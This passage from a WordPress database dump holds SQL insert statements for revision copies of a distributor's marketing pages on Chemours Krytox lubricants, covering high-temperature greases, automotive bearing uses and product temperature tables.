inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-vpf-1506/">Krytox 1506</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox 1514</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1525/">Krytox 1525</a></td>\r\n<td>Mechanical pumps</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[ux_product_categories ids="46,115,38" number="10"]', 'Krytox H-1 Food Grade Lubricants', '', 'inherit', 'closed', 'closed', '', '2442-revision-v1', '', '', '2016-10-12 12:47:17', '2016-10-12 12:47:17', '', 2442, 'https://www.miller-stephenson.com/2442-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2518, 2, '2016-10-12 19:40:03', '2016-10-12 19:40:03', '<h1><strong>CHALLENGE: Overcoming high temperature lubricant degradation with Krytox™ XHT</strong></h1>\nConventional lubricants are subject to oxidation, attack by harsh chemicals or solvents, flammability, and volatilization of the base oil, leading to failure of the lubrication system and associated hazards. Conventional\nlubricant properties are often found inadequate for critical systems where failure is not an option. Krytox™ XHT greases and oils help alleviate these issues.\n\nAt the same time, conventional mineral oil lubricants begin to degrade quickly at temperatures above 93 °C (200 °F), and most alternative synthetic technologies begin to degrade quickly at temperatures above 149 °C (300 °F). When conventional oils and thickeners break down to form tars and solids that cause bearings to freeze up, frequent re-lubrication is required and component life is sacrificed. In fact, re-lubrication must occur more frequently as the temperature increases above 71 °C (160 °F). For every 10 °C (20 °F) increase in temperature, the life of the grease is cut in half, which can mean that re-lubrication is required every few hours at extreme temperatures.\n\nIf re-lubrication is missed for any reason, the equipment fails. Frequent re-lubrication, as well as frequent component outages, drive up maintenance materials and manpower cost, not to mention the substantial cost of\nlost production.\n\nFurthermore, recirculating oil systems are often employed to remove component heat. These can require 50x the lubricant volume of Krytox™, resulting in housekeeping, disposal, and other environmental issues. A malfunction in the recirculating oil system can very quickly result in component bearing failure.\n<h4><strong>What are Krytox™ XHT lubricants?</strong></h4>\nKrytox™ XHT lubricants are made from Chemours proprietary fluoropolymer base oils and high performance thickeners. As with all Krytox lubricants, these products provide excellent lubrication properties and are chemically inert, thermally stable, nonflammable, and non-volatile, making Krytox™ the most robust family of lubricants available.\n<h4><strong>SOLUTION: Krytox™ XHT lubricants take the heat and provide excellent lubrication in the harshest environments</strong></h4>\nThe extra high temperature (XHT) line of fluoropolymer lubricants broadens the overall Krytox™ lubrication line to address long life lubrication needs from –74 °C (–100 °F) up to 399 °C (750 °F). Specifically, Krytox XHT greases are designed for applications in the 204–399 °C (400–750 °F) temperature range for use in bearings, gears, chains, O-rings, sliding, and other mechanical components. These products are excellent for use in many harsh industrial applications and are currently used in mining, metal processing, power generation, textile, aviation, baking, and chemical applications.\n\nKrytox™ XHT-AC grease was recently applied in a line of copper rod mill sizing bearings. These bearings run at temperatures of 204–260 °C (400–500 °F). Before Krytox™, a standard lithium-thickened mineral oil was\napplied daily; the bearing life was typically 1–2 weeks. After applying Krytox™ XHT-AC grease, bearings have been running for over six months with no failures. The bearings were inspected and re-lubricated after four\nmonths and look to be in excellent condition. Using Krytox™ has resulted in substantial savings in man-hours and bearing replacement cost, as well as a significant increase in uptime.\n\nKrytox™ XHT-BDX was also applied to dampers in a power plant-fired boiler that control a 371 °C (700 °F) air stream. Graphite had been used previously, resulting in damper sticking and loss of control. Krytox™ XHT-BDX was installed in March 2000, and dampers have operated trouble free since that time. Krytox XHT-AC has been in use for 18 months in a waffle-baking oven bearing application at temperatures from 260–315 °C (500–600 °F). Krytox XHT-BDX is currently being used as an O-ring lubricant for aircraft environmental control systems. This system diverts engine exhaust to the wings for de-icing purposes. No other lubricant could withstand the 315°C (600 °F) temperatures of engine exhaust.\n<h4><strong>PERFORMANCE: Krytox™ XHT—The lubricant for hot, hot, hot applications</strong></h4>\nIncreased uptime and reduced maintenance costs lead to higher productivity. More reliable equipment with consistent performance reduces quality problems and waste. Unscheduled shutdowns are avoided and safety is increased, because there is less time spent around hot equipment.\n\nKrytox™ XHT lubricants are ideal for your high temperature lubrication systems. Besides the ability to work in harsh environments and high temperatures, Krytox™ XHT lubricants provide typical savings that are 10–100 times or more the cost of the lubricant. What are you waiting for?\n\n[ux_product_categories ids="115,116" number="10"]\n\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">Click here</a> to learn more about Krytox™ XHT.\n\n&nbsp;', 'Krytox™ XHT Takes the Heat', '', 'inherit', 'closed', 'closed', '', '2375-autosave-v1', '', '', '2016-10-12 19:40:03', '2016-10-12 19:40:03', '', 2375, 'https://www.miller-stephenson.com/2375-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2519, 2, '2016-10-12 12:51:33', '2016-10-12 12:51:33', '<h1><strong>CHALLENGE: Overcoming high temperature lubricant degradation with Krytox XHT</strong></h1>\r\nConventional lubricants are subject to oxidation, attack by harsh chemicals or solvents, flammability, and volatilization of the base oil, leading to failure of the lubrication system and associated hazards. Conventional\r\nlubricant properties are often found inadequate for critical systems where failure is not an option. Krytox XHT greases and oils help alleviate these issues.\r\n\r\nAt the same time, conventional mineral oil lubricants begin to degrade quickly at temperatures above 93 °C (200 °F), and most alternative synthetic technologies begin to degrade quickly at temperatures above 149 °C (300 °F). When conventional oils and thickeners break down to form tars and solids that cause bearings to freeze up, frequent re-lubrication is required and component life is sacrificed. In fact, re-lubrication must occur more frequently as the temperature increases above 71 °C (160 °F). For every 10 °C (20 °F) increase in temperature, the life of the grease is cut in half, which can mean that re-lubrication is required every few hours at extreme temperatures.\r\n\r\nIf re-lubrication is missed for any reason, the equipment fails. Frequent re-lubrication, as well as frequent component outages, drive up maintenance materials and manpower cost, not to mention the substantial cost of\r\nlost production.\r\n\r\nFurthermore, recirculating oil systems are often employed to remove component heat. These can require 50x the lubricant volume of Krytox, resulting in housekeeping, disposal, and other environmental issues. A malfunction in the recirculating oil system can very quickly result in component bearing failure.\r\n<h4><strong>What are Krytox XHT lubricants?</strong></h4>\r\nKrytox XHT lubricants are made from Chemours proprietary fluoropolymer base oils and high performance thickeners. As with all Krytox lubricants, these products provide excellent lubrication properties and are chemically inert, thermally stable, nonflammable, and non-volatile, making Krytox the most robust family of lubricants available.\r\n<h4><strong>SOLUTION: Krytox XHT lubricants take the heat and provide excellent lubrication in the harshest environments</strong></h4>\r\nThe extra high temperature (XHT) line of fluoropolymer lubricants broadens the overall Krytox lubrication line to address long life lubrication needs from –74 °C (–100 °F) up to 399 °C (750 °F). Specifically, Krytox XHT greases are designed for applications in the 204–399 °C (400–750 °F) temperature range for use in bearings, gears, chains, O-rings, sliding, and other mechanical components. These products are excellent for use in many harsh industrial applications and are currently used in mining, metal processing, power generation, textile, aviation, baking, and chemical applications.\r\n\r\nKrytox XHT-AC grease was recently applied in a line of copper rod mill sizing bearings. These bearings run at temperatures of 204–260 °C (400–500 °F). Before Krytox, a standard lithium-thickened mineral oil was\r\napplied daily; the bearing life was typically 1–2 weeks. After applying Krytox XHT-AC grease, bearings have been running for over six months with no failures. The bearings were inspected and re-lubricated after four\r\nmonths and look to be in excellent condition. Using Krytox has resulted in substantial savings in man-hours and bearing replacement cost, as well as a significant increase in uptime.\r\n\r\nKrytox XHT-BDX was also applied to dampers in a power plant-fired boiler that control a 371 °C (700 °F) air stream. Graphite had been used previously, resulting in damper sticking and loss of control. Krytox XHT-BDX was installed in March 2000, and dampers have operated trouble free since that time. Krytox XHT-AC has been in use for 18 months in a waffle-baking oven bearing application at temperatures from 260–315 °C (500–600 °F). Krytox XHT-BDX is currently being used as an O-ring lubricant for aircraft environmental control systems. This system diverts engine exhaust to the wings for de-icing purposes. No other lubricant could withstand the 315°C (600 °F) temperatures of engine exhaust.\r\n<h4><strong>PERFORMANCE: Krytox XHT—The lubricant for hot, hot, hot applications</strong></h4>\r\nIncreased uptime and reduced maintenance costs lead to higher productivity. More reliable equipment with consistent performance reduces quality problems and waste. Unscheduled shutdowns are avoided and safety is increased, because there is less time spent around hot equipment.\r\n\r\nKrytox XHT lubricants are ideal for your high temperature lubrication systems. Besides the ability to work in harsh environments and high temperatures, Krytox XHT lubricants provide typical savings that are 10–100 times or more the cost of the lubricant. What are you waiting for?\r\n\r\n[ux_product_categories ids="115,116" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">Click here</a> to learn more about Krytox XHT.', 'Krytox XHT Takes the Heat', '', 'inherit', 'closed', 'closed', '', '2375-revision-v1', '', '', '2016-10-12 12:51:33', '2016-10-12 12:51:33', '', 2375, 'https://www.miller-stephenson.com/2375-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2520, 2, '2016-10-12 12:53:09', '2016-10-12 12:53:09', '<h1><strong>Krytox Automotive Bearing Lubrication Applications</strong></h1>\n<h4><strong>High Performance Lubricants That Work in Demanding Real-Life Applications</strong></h4>\nReliable high-performance fluoropolymer lubricants from Chemours can stand up to even extreme conditions. Krytox™ oils and greases have proven scientific and technical properties to help solve the most critical issues in the automotive industry. Superior product performance, lower overall maintenance systems cost, and a lower environmental footprint help to meet rising consumer expectations. For automotive manufacturers, this provides the opportunity to offer extended warranties and enjoy improved productivity through reduced component failure.\n\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">Krytox™ oils and greases</a> are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 288°C (550 °F), and higher temperatures for shorter periods, depending on product grade limits. Krytox™ oils and greases are exceptionally safe, reliable, and offer environmental benefits as well as longer lubricant life. These oils and greases will not burn or support combustion, even in 100% liquid or gaseous oxygen, nor will they degrade or break down in the presence of aggressive chemicals. In automotive applications, Krytox™ oils and greases deliver low\ntemperature starting performance, while maintaining efficacy at higher temperatures. These oils and greases can increase service life of critical components, allowing them to run more quietly and last longer, for superior, reliable performance.\n<table width="662">\n<tbody>\n<tr>\n<td width="250"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™ Oils and Greases</a></td>\n<td style="text-align: center;" width="206">Viscosity, cSt</td>\n<td style="text-align: center;" width="206">Temperature Range, °C (°F)</td>\n</tr>\n<tr>\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">GPL 204</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">GPL 214</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">GPL 224</a>, GPL 294, GPL 2E4, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">XP2A4</a></td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">–51–179 (–60–354)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">AUT 2E45, AUT 2245, AUT 2045, AUT 2A45</a></td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">–40–200 (–40–392)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">GPL 205</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">GPL 215</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">GPL 225</a>, GPL 295, GPL 2E5, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">XP2A5</a></td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">–36–210 (–33–410)</td>\n</tr>\n</tbody>\n</table>\n<h4><strong>Krytox™—Products for the Automotive Industry</strong></h4>\nSeveral grades of Krytox™ oil and grease are suitable for automotive use, depending on the application type and temperature range encountered. The table above lists the most common grades currently being used. More detailed data is available on the web at <a href="https://www.miller-stephenson.com/krytox/">www.miller-stephenson.com/krytox.</a> <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">Solutions for automotive industries can be found by clicking here.</a>\n\n<img class="size-medium wp-image-2504 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-bearing-lubrication-800x465.jpg" alt="automotive-bearing-lubrication" width="800" height="465" />\n\n<strong>Proven Applications</strong>\n\n<strong>Fan Clutch</strong>\n\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and high viscosity, providing long life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\n\n<strong>Alternator</strong>\n\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators and, hence, the bearings get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure. As the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation. This reduces the alternator’s performance and robs performance from the rest of the automobile. Perhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running.\n\nThe higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced and reliable, heat-stability and performance of Krytox™ greases.\n<h4><strong>Clutch Pilot Automotive Bearing</strong></h4>\nThe pilot bearings support the clutch-end of the transmission shaft. If the lubricant in the pilot bearing fails, the transmission itself will fail. Pilot bearings lubricated with Krytox™ high performance lubricants will last longer and perform better than those lubricated with other synthetic lubricants, due to the high-load capability and chemical inertness of Krytox™ products.\n<h4><strong>Cooling Fan</strong></h4>\nTo maximize performance, an automobile’s engine must run at its optimal temperature (typically around 93 °C [200 °F]), which is controlled by the cooling system. One component of the system is the cooling fan, which blows air through the radiator, removing excess heat. Failure in the cooling fan’s bearings leads to failure of the fan, which will eventually result in overheating of the engine. The sintered bearings used in cooling fans often fail in two ways: either the lubricant volatilizes, or it degrades through oxidation. The use of Krytox™ prevents both of these modes of failure, due to its low volatility and unsurpassed resistance to oxidation.\n<h4><strong>Heavy Duty Truck Automatic Clutch</strong></h4>\nIn many heavy duty trucks, the engines have a much lower rpm upper limit. In order to prevent the engine from being destroyed, an automatic clutch is used. When the set maximum rpm limit is reached, the automatic clutch disengages and notifies the driver to shift gears. This both prevents engine damage and increases ease of operation. The bearings present in the clutch are critical to its operation and must receive adequate lubrication in order to work properly. Lubricating with Krytox™ mid-range viscosity and low volatility lubricants reduces the chance that the bearings will fail with the frequent gear-shifting and high loads experienced throughout the extended driving life of these trucks.\n\nTo learn more about Krytox Automotive Non Bearing lubrication applications please <a href="https://www.miller-stephenson.com/krytox-automotive/">click here.</a>', 'Krytox Automotive Bearing Lubrication Applications', '', 'inherit', 'closed', 'closed', '', '2503-autosave-v1', '', '', '2016-10-12 12:53:09', '2016-10-12 12:53:09', '', 2503, 'https://www.miller-stephenson.com/2503-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2521, 2, '2016-10-12 12:53:20', '2016-10-12 12:53:20', '<h1><strong>Krytox Automotive Bearing Lubrication Applications</strong></h1>\r\n<h4><strong>High Performance Lubricants That Work in Demanding Real-Life Applications</strong></h4>\r\nReliable high-performance fluoropolymer lubricants from Chemours can stand up to even extreme conditions. Krytox™ oils and greases have proven scientific and technical properties to help solve the most critical issues in the automotive industry. Superior product performance, lower overall maintenance systems cost, and a lower environmental footprint help to meet rising consumer expectations. For automotive manufacturers, this provides the opportunity to offer extended warranties and enjoy improved productivity through reduced component failure.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">Krytox™ oils and greases</a> are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 288°C (550 °F), and higher temperatures for shorter periods, depending on product grade limits. Krytox™ oils and greases are exceptionally safe, reliable, and offer environmental benefits as well as longer lubricant life. These oils and greases will not burn or support combustion, even in 100% liquid or gaseous oxygen, nor will they degrade or break down in the presence of aggressive chemicals. In automotive applications, Krytox™ oils and greases deliver low\r\ntemperature starting performance, while maintaining efficacy at higher temperatures. These oils and greases can increase service life of critical components, allowing them to run more quietly and last longer, for superior, reliable performance.\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™ Oils and Greases</a></td>\r\n<td style="text-align: center;" width="206">Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Temperature Range, °C (°F)</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">GPL 204</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">GPL 214</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">GPL 224</a>, GPL 294, GPL 2E4, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">XP2A4</a></td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">–51–179 (–60–354)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">AUT 2E45, AUT 2245, AUT 2045, AUT 2A45</a></td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">–40–200 (–40–392)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">GPL 205</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">GPL 215</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">GPL 225</a>, GPL 295, GPL 2E5, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">XP2A5</a></td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">–36–210 (–33–410)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Krytox™—Products for the Automotive Industry</strong></h4>\r\nSeveral grades of Krytox™ oil and grease are suitable for automotive use, depending on the application type and temperature range encountered. The table above lists the most common grades currently being used. More detailed data is available on the web at <a href="https://www.miller-stephenson.com/krytox/">www.miller-stephenson.com/krytox.</a> <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">Solutions for automotive industries can be found by clicking here.</a>\r\n\r\n<img class="size-medium wp-image-2504 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-bearing-lubrication-800x465.jpg" alt="automotive-bearing-lubrication" width="800" height="465" />\r\n\r\n<strong>Proven Applications</strong>\r\n\r\n<strong>Fan Clutch</strong>\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and high viscosity, providing long life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\n<strong>Alternator</strong>\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators and, hence, the bearings get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure. As the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation. This reduces the alternator’s performance and robs performance from the rest of the automobile. Perhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running.\r\n\r\nThe higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced and reliable, heat-stability and performance of Krytox™ greases.\r\n<h4><strong>Clutch Pilot Automotive Bearing</strong></h4>\r\nThe pilot bearings support the clutch-end of the transmission shaft. If the lubricant in the pilot bearing fails, the transmission itself will fail. Pilot bearings lubricated with Krytox™ high performance lubricants will last longer and perform better than those lubricated with other synthetic lubricants, due to the high-load capability and chemical inertness of Krytox™ products.\r\n<h4><strong>Cooling Fan</strong></h4>\r\nTo maximize performance, an automobile’s engine must run at its optimal temperature (typically around 93 °C [200 °F]), which is controlled by the cooling system. One component of the system is the cooling fan, which blows air through the radiator, removing excess heat. Failure in the cooling fan’s bearings leads to failure of the fan, which will eventually result in overheating of the engine. The sintered bearings used in cooling fans often fail in two ways: either the lubricant volatilizes, or it degrades through oxidation. The use of Krytox™ prevents both of these modes of failure, due to its low volatility and unsurpassed resistance to oxidation.\r\n<h4><strong>Heavy Duty Truck Automatic Clutch</strong></h4>\r\nIn many heavy duty trucks, the engines have a much lower rpm upper limit. In order to prevent the engine from being destroyed, an automatic clutch is used. When the set maximum rpm limit is reached, the automatic clutch disengages and notifies the driver to shift gears. This both prevents engine damage and increases ease of operation. The bearings present in the clutch are critical to its operation and must receive adequate lubrication in order to work properly. Lubricating with Krytox™ mid-range viscosity and low volatility lubricants reduces the chance that the bearings will fail with the frequent gear-shifting and high loads experienced throughout the extended driving life of these trucks.\r\n\r\nTo learn more about Krytox Automotive Non Bearing lubrication applications please <a href="https://www.miller-stephenson.com/krytox-automotive/">click here.</a>', 'Krytox Automotive Bearing Lubrication Applications', '', 'inherit', 'closed', 'closed', '', '2503-revision-v1', '', '', '2016-10-12 12:53:20', '2016-10-12 12:53:20', '', 2503, 'https://www.miller-stephenson.com/2503-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2522, 2, '2016-10-12 12:55:35', '2016-10-12 12:55:35', '<h1><strong>Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs</strong></h1>\r\nPowered by Chemours Science… Over the last fifty years, Krytox™ automotive lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.\r\n<h4><strong>Advanced Solutions for the Automotive Industry | Automotive Lubricants</strong></h4>\r\nKrytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.\r\n\r\nOur family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n\r\nLonger Lasting Lubrication\r\n\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n<h4><strong>The Right Choice for Your Design Challenge</strong></h4>\r\nKrytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.\r\n<h4><strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong></h4>\r\n<ul>\r\n 	<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other automotive lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\r\n 	<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated automotive lubricants are made of fluorine, oxygen, and carbon only.</li>\r\n 	<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\r\n 	<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\r\n 	<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\r\n</ul>\r\n<h4><strong>The Right Choice for Our Environment</strong></h4>\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n<h4><strong>Effective Over a Wide Temperature Range</strong></h4>\r\nKrytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.\r\n\r\nFigure 1 Ball Bearing Grease Performance Test with Krytox™ Greases\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Grade</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n<td style="text-align: center;">60/9</td>\r\n<td style="text-align: center;">180 °C (356 °F)</td>\r\n<td style="text-align: center;">4,900+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n<td style="text-align: center;">100/12.3</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,500+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\r\n<td style="text-align: center;">160/18</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,000+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox™ XHT AC</a></td>\r\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\r\n<td style="text-align: center;">500/47</td>\r\n<td style="text-align: center;">250 °C (482 °F)</td>\r\n<td style="text-align: center;">2,000+</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Compatibility with Elastomers and Plastics</strong></h4>\r\nKrytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:\r\n<ul>\r\n 	<li>Fluorosilicone</li>\r\n 	<li>Hytrel® Polyester Elastomer</li>\r\n 	<li>Delrin® Acetal</li>\r\n 	<li>Ethylacrylate</li>\r\n 	<li>Methyl Silicone</li>\r\n 	<li>Butyl 325</li>\r\n 	<li>Neoprene WRT</li>\r\n 	<li>Kalrez® Fluoroelastomer*</li>\r\n 	<li>Zytel® Nylon</li>\r\n 	<li>Viton™ A Fluoroelastomer</li>\r\n 	<li>Nycar 100 (Buna N)</li>\r\n 	<li>Vespel®</li>\r\n 	<li>Urethane</li>\r\n 	<li>Hypalon® Synthetic Rubber</li>\r\n 	<li>EPT Peroxide Cure</li>\r\n 	<li>Hydrocarbon Rubber</li>\r\n 	<li>Teflon™ Fluoropolymer</li>\r\n</ul>\r\n<h4><strong>Compatibility with Metals</strong></h4>\r\nBecause of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).\r\n\r\nAbove this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.\r\n<h4><strong>Robust Electrical Properties</strong></h4>\r\nKrytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated automotive lubricants are chemically inert, insoluble in most common solvents, and nonflammable.\r\n<h4><strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong></h4>\r\nKrytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.\r\n<h4><strong>Cost-Effective</strong></h4>\r\nKrytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ automotive lubricants reduce repair costs and potentially save millions in warranty claims.\r\n\r\nFigure 2 Krytox™ Performance Lubricants Product Range\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250">Typical Automotive Lubricants Grade</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-104/">Krytox™ GPL 104</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a 